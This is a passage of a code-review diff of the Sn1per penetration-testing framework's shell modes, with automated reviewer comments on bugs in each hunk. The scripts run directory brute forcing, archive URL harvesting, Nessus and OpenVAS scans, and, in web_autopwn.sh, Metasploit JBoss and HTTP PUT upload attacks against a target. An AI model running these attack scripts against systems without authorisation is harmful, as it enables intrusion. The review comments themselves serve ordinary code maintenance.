curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2022-33-index?url=*.$TARGET&output=json" -H 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Safari/537.36' 2> /dev/null | jq -r .url | egrep -v "null" | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$WAYBACKMACHINE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$HACKERTARGET" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING HACKERTARGET URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s GET "https://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid|error getting links" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null | head -n 250
echo " "
fi
if [[ "$GAU" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED FETCHING GUA URLS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
gau --subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null | head -n 250
fi
if [[ "$BLACKWIDOW" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
touch $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cp $LOOT_DIR/web/spider-$TARGET.txt $LOOT_DIR/web/spider-$TARGET.bak 2>/dev/null
blackwidow -u https://$TARGET:443 -l 1 -v n
cp -f /usr/share/blackwidow/"$TARGET"_443/"$TARGET"_443-*.txt $LOOT_DIR/web/ 2>/dev/null
cat /usr/share/blackwidow/"$TARGET"_*/"$TARGET"_*-urls-sorted.txt > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
diff $LOOT_DIR/web/spider-$TARGET.bak $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2}' 2> /dev/null >> $LOOT_DIR/web/spider-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/spider-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Spider URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
head -n 20 $LOOT_DIR/web/spider-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_SPIDER_NEW" == "1" && "SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/spider-new-$TARGET.txt"
fi
fi
source $INSTALL_DIR/modes/static-grep-search.sh
if [[ "$WEB_JAVASCRIPT_ANALYSIS" == "1" ]]; then
source $INSTALL_DIR/modes/javascript-analysis.sh
fi
if [[ $WEB_BRUTE_STEALTHSCAN == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ "$DIRSEARCH" == "1" ]]; then
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x $WEB_BRUTE_EXCLUDE_CODES -F -e "/" -t $THREADS --exclude-texts=Attack Detected,Please contact the system administrator,Page Not Found,URL No Longer Exists --random-agent --output=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
mv $LOOT_DIR/web/dirsearch-$TARGET.sorted $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/web/dirsearch-$TARGET.bak $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{print $2 " " $3 " " $4}' 2> /dev/null >> $LOOT_DIR/web/dirsearch-new-$TARGET.txt
if [[ $(wc -c $LOOT_DIR/web/dirsearch-new-$TARGET.txt | awk '{print $1}') > 3 ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Disovered URL change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/web/dirsearch-new-$TARGET.txt 2> /dev/null >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
if [[ "$SLACK_NOTIFICATIONS_DIRSEARCH_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/web/dirsearch-new-$TARGET.txt"
fi
fi
if [[ "$GOBUSTER" == "1" ]]; then
gobuster -u https://$TARGET -w $WEB_BRUTE_STEALTH -e | tee $LOOT_DIR/web/webbrute-$TARGET-https-stealth.txt
sort -u $LOOT_DIR/web/webbrute-$TARGET-*.txt 2> /dev/null > $LOOT_DIR/web/webbrute-$TARGET.txt 2> /dev/null
fi
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
egrep -v '<|>|;|(|)' $LOOT_DIR/web/robots-$TARGET-https.txt | tee $LOOT_DIR/web/robots-$TARGET-https.txt
fi
if [[ "$SSL" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
fi
if [[ "$SSL_INSECURE" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CHECKING FOR INSECURE SSL/TLS CONFIGURATIONS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl https://$TARGET 2> $LOOT_DIR/web/curldebug-$TARGET.txt > /dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
else
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:443
fi
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
source $INSTALL_DIR/modes/sc0pe.sh
fi
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo -e ""
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_stealth.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
if [[ "$LOOT" = "1" ]]; then
loot
fi
exit
fi
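Review bot: the change-detection tests at L6079, L6105, L6235 and L6260 use `[[ $(wc -c ...) > 3 ]]`, which inside `[[ ]]` is a lexicographic string comparison, not a numeric one, so a byte count such as `1234` compares lower than `3` and the "change detected" notification fires only when the count happens to start with a digit above 3; use `-gt` (and `wc -c < file` to avoid the awk). Two more conditions are dead: L6083 and L6239 compare the literal string `"SLACK_NOTIFICATIONS"` (missing `$`) with `"1"`, so the Slack spider notification is never posted. The HTML escaping of the spider output at L6074, L6156 and L6231 is also lost: `sed -ir` is parsed by sed as `-i` with backup suffix `r`, not as in-place plus extended regex, so it writes an unedited `spider-$TARGET.txtr` copy; L6075 then moves that unedited copy back over the edited file, while the port-443 branch simply leaves the stray `.txtr` file behind. The replacement text `\&lh\;` is not an HTML entity either; write `sed -i -r 's/</\&lt;/g'`. The dirsearch invocations at L6098 and L6254 pass `--exclude-texts=Attack Detected,Please contact the system administrator,...` unquoted, so the shell splits it into `--exclude-texts=Attack` plus stray positional arguments that the argument parser rejects, and `2> /dev/null` hides the failure; quote the whole value. At L6118 and L6273 the robots.txt filter reads and writes the same file through `tee`, so the file is truncated before it has been read, and in an ERE the parentheses in `'<|>|;|(|)'` are grouping characters, so `(|)` matches the empty string and `-v` drops every remaining line; escape them (`'\(|\)'`) and write to a temporary file before moving it into place. Smaller points: L6052 and L6209 pass `GET` as a bare URL argument to curl rather than as `-X GET`, and the `egrep -v` pattern on the same lines repeats each term twice; L6197 passes the User-Agent string with `-H` but without a `User-Agent:` prefix, so no such header is sent (use `-A`), and the `CC-MAIN-2022-33` index is hard-coded and will go stale; L6272 fetches robots.txt without the `--connect-timeout`/`--read-timeout`/`--tries` guards that L6117 uses, which is exactly the kind of call that hangs a scan; L6132 and L6301 still call `python2` while the rest of the hunk runs dirsearch and wig under `python3`; L6303 reports the port-443 screenshot as saved regardless of whether CUTYCAPT or WEBSCREENSHOT was enabled or succeeded; and the banners at L6057 and L6214 say "GUA" (file names `gua-$TARGET.txt`) where the tool is GAU. Finally, the port-80 block (L6042 to L6134) and the port-443 block (L6199 to L6304) are near-verbatim copies differing only in scheme and port, and the fix at L6075 that is missing at L6231 shows why: factoring this into a function taking scheme and port would keep the two paths in sync and cut the hunk roughly in half.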

134
modes/vulnscan.sh Normal file

@@ -0,0 +1,134 @@
# FULLPORTONLY MODE
if [[ "$MODE" = "vulnscan" ]]; then
if [[ "$REPORT" = "1" ]]; then
args="-t $TARGET"
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m vulnscan"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-vulnscan.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
logo
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$NESSUS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING NESSUS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
bash /usr/share/sniper/bin/nessus.sh $TARGET $NESSUS_KEY $NESSUS_HOST $NESSUS_USERNAME $NESSUS_PASSWORD $NESSUS_POLICY_ID $LOOT_DIR
fi
if [[ "$OPENVAS" = "1" ]]; then
sudo openvas-start 2> /dev/null > /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING OPENVAS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "Scanning target: $TARGET "
echo ""
echo "-----------------------------------------------"
echo "Listing OpenVAS version..."
echo "-----------------------------------------------"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -O
echo ""
echo "Listing OpenVAS targets..."
echo "-----------------------------------------------"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -T
echo ""
echo "Listing OpenVAS tasks..."
echo "-----------------------------------------------"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G
echo ""
echo "Creating scan task..."
echo "-----------------------------------------------"
ASSET_ID=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="<create_target><name>$TARGET</name><hosts>$TARGET</hosts></create_target>" | xmlstarlet sel -t -v /create_target_response/@id) && echo "ASSET_ID: $ASSET_ID"
if [[ "$ASSET_ID" == "" ]]; then
ASSET_ID_ERROR=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml="<create_target><name>$TARGET</name><hosts>$TARGET</hosts></create_target>")
if [[ "$ASSET_ID_ERROR" == *"Target exists already"* ]]; then
ASSET_ID=$(omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -T | grep " $TARGET" | awk '{print $1}')
echo "ASSET_ID: $ASSET_ID"
fi
fi
TASK_ID=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<create_task><name>$TARGET</name><preferences><preference><scanner_name>source_iface</scanner_name><value>eth0</value></preference></preferences><config id=\"74db13d6-7489-11df-91b9-002264764cea\"/><target id=\"$ASSET_ID\"/></create_task>" | xmlstarlet sel -t -v /create_task_response/@id) && echo "TASK_ID: $TASK_ID"
if [[ "TASK_ID" == "" ]]; then
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<create_task><name>$TARGET</name><preferences><preference><scanner_name>source_iface</scanner_name><value>eth0</value></preference></preferences><config id=\"74db13d6-7489-11df-91b9-002264764cea\"/><target id=\"$ASSET_ID\"/></create_task>"
fi
REPORT_ID=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<start_task task_id=\"$TASK_ID\"/>" | cut -d\> -f3 | cut -d\< -f1) && echo "REPORT_ID: $REPORT_ID"
if [[ "$REPORT_ID" == "" ]]; then
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<start_task task_id=\"$TASK_ID\"/>"
fi
echo ""
resp=""
while [[ $resp != "Done" && $REPORT_ID != "" ]]
do
omp -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TASK_ID
resp=$(omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep "$TASK_ID" | awk '{print $2}')
sleep 60
done
if [[ $REPORT_ID != "" ]]; then
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD --xml "<get_reports report_id=\"$REPORT_ID\" format_id=\"6c248850-1f62-11e1-b082-406186ea4fc5\"/>" | cut -d\> -f3 | cut -d\< -f1 | base64 -d > "$LOOT_DIR/output/openvas-$TARGET.html"
echo "Report saved to $LOOT_DIR/output/openvas-$TARGET.html"
cat $LOOT_DIR/output/openvas-$TARGET.html 2> /dev/null
else
echo "No report ID found. Listing scan tasks:"
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET
fi
fi
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE WEB VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
SSL="false"
PORT="80"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
SSL="true"
PORT="443"
source $INSTALL_DIR/modes/sc0pe-passive-webscan.sh
source $INSTALL_DIR/modes/sc0pe-active-webscan.sh
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done
source $INSTALL_DIR/modes/sc0pe-network-scan.sh
fi
source $INSTALL_DIR/modes/sc0pe.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
loot
exit
fi
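Review bot: the OpenVAS task-creation fallback at L6428 compares the literal string `"TASK_ID"` (missing `$`) with `""`, so the retry branch never executes, and the fallback calls at L6421, L6423 and L6439 drop `-h $OPENVAS_HOST -p $OPENVAS_PORT`, so when the primary call fails against a remote manager the fallback silently talks to the default local host instead of the configured one. The polling loop at L6437 to L6442 has no exit for failed or stopped tasks: if the task status never reaches `Done` (for example `Stopped` or an interrupted scan) the loop runs forever at one `omp -G` per minute; add a timeout or a check for terminal non-`Done` states. Every `omp` call passes `-w $OPENVAS_PASSWORD` on the command line, and L6395 passes `$NESSUS_PASSWORD` the same way, which exposes the scanner credentials to any local user via the process list; omp can read credentials from its config file, and nessus.sh could read them from the environment. L6395 also hard-codes `/usr/share/sniper/bin/nessus.sh` where L6386 uses `$INSTALL_DIR/bin/slack.sh`, so a non-default install path breaks the Nessus step. At L6444 the report XML is extracted with `cut -d\> -f3 | cut -d\< -f1`, which breaks as soon as the response carries an extra element or attribute; xmlstarlet is already used at L6419 and L6427 and should be used here too. L6427 hard-codes `source_iface` to `eth0` and a fixed scan-config id; both belong in the configuration alongside `$OPENVAS_HOST`. At L6469 `source $INSTALL_DIR/modes/sc0pe.sh` sits outside the `SC0PE_VULNERABLITY_SCANNER` guard that closes at L6468, unlike the equivalent call in the stealth mode, so the sc0pe report runs even when the scanner is disabled; move it inside the guard or document the difference. Lastly the header comment at L6360 reads `# FULLPORTONLY MODE` for a file named vulnscan.sh, and L6476 to L6478 post nmap result files to Slack although nothing in this hunk runs nmap, so those files may not exist for this mode.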

22
modes/web.sh Normal file

@@ -0,0 +1,22 @@
# WEB MODE #############################################################################################################
if [[ "$MODE" = "web" ]]; then
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
fi
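Review bot: `args` is never initialised in this hunk before L6497 appends `-w $WORKSPACE` to it, so whatever value a previously sourced mode left in `args` (vulnscan.sh sets it to `-t $TARGET ... --noreport -m vulnscan`) is passed through to the `sniper` call at L6511 as extra, possibly conflicting, flags; add `args=""` at the top of the mode. Nothing in this hunk runs when `REPORT` is not `1`: the `if` at L6495 is the only branch inside the mode, so if the actual web-scan body lives in another file, a comment at L6493 pointing to it would save the next reader a search. The workspace directory setup at L6498 to L6507 is the same eight-line block that vulnscan.sh carries, and is worth extracting into a shared helper so every mode creates the same loot layout.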

236
modes/web_autopwn.sh Normal file

@@ -0,0 +1,236 @@
if [[ "$MSF_LEGACY_WEB_EXPLOITS" == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
